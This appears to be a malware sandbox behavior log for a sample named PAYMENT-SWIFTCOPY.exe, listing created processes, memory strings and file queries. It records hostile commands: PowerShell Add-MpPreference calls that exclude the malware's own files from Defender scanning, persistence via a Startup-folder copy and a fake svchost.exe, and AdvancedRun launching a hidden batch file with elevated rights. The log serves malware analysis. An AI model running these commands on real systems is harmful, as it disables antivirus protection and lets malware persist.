              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -ForceJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\a1e3c074-cdf7-4e07-abcb-16ac4b773fa2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\f45e65ee-34b0-4b09-bb00-47b7b675bf5c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Windows\Cursors\???????????????\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b0d1990f-10a3-43bc-b57f-e9191c796b30\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /SpecialRun 4101d8 4952Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' Jump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\???????????????\svchost.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exeJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 2996Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exe' /SpecialRun 4101d8 4952Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\478a15a9-383f-4559-9b72-f674e0bd8a43\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exe' -Force
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\???????????????.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\abac2cde-4acc-4359-8cf2-4dbb768f0faf\AdvancedRun.exeCode function: 3_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,3_2_00401C26
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.353804679.0000000001600000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.353804679.0000000001600000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.353804679.0000000001600000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.353804679.0000000001600000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
              Source: PAYMENT-SWIFTCOPY.exe, 00000000.00000000.353804679.0000000001600000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeQueries volume information: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PAYMENT-SWIFTCOPY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
